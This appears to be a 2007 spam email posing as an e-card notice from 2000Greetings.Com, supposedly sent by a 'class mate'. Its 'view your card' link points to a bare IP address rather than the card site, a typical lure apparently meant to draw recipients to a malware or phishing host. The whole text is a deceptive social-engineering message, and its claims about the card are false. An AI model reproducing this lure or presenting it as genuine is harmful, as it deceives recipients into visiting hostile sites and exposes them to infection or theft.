Subject: Class mate sent you a greeting card from 2000Greetings.Com!

From: "2000Greetings.Com" <[email-masked]>
Date: Fri, 10 Aug 2007 17:53:23 +0900

Class mate has created an ecard for you at 2000Greetings.Com,
the Internet's most popular greeting card service. 

Your greeting card ID is: 6291c3de8293ec6968e3ca036e47840d8e11786 

To see your custom greeting card, simply click on the link below: 
http://69.0.124.253/?6291c3de8293ec6968e3ca036e47840d8e11786

Send greeting cards from 2000Greetings.Com whenever you want by visiting us at: 
http://2000Greetings.Com/
Copyright (c) 1996-2007 2000Greetings.Com All Rights Reserved